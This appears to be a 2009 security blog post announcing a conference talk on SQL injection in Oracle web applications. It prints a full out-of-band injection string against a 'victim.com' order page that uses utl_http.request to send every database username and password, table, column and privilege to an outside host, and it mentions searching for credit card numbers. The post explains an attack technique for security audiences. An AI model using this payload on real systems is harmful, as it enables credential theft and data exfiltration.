Presentation from Confidence 2009 available

I just uploaded the presentation “SQL Injection in Oracle Webapps” to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this  SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.

http://victim.com/order.jsp?id=17‘ or 1=((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

username||’='||password) from dba_users)))+((select

sum(utl_http.request(’http://www. orasploit.com/’||

owner||’='||table_name) from dba_tables))+((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

owner||’='||table_name||’='||column_name)) from dba_users))

+((select sum(length(utl_http.request(’http://

www.orasploit.com/’||grantee||’='||granted_role) from

dba_role_privs)))+((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

grantee||’='||owner||’='||table_name||’='||privilege||’='||

grantable) from dba_tab_privs)))–

Dieser Eintrag wurde am 16 Mai 2009 um 09:33 verfasst und befindet sich in SQL Injection, Security, Allgemein. Sie können alle Antworten zu diesem Eintrag über den Feed RSS 2.0 mitverfolgen. Antworten sind derzeit nicht möglich, aber Sie können einen Trackback-Link von Ihrer eigenen Seite setzen.

| Drucken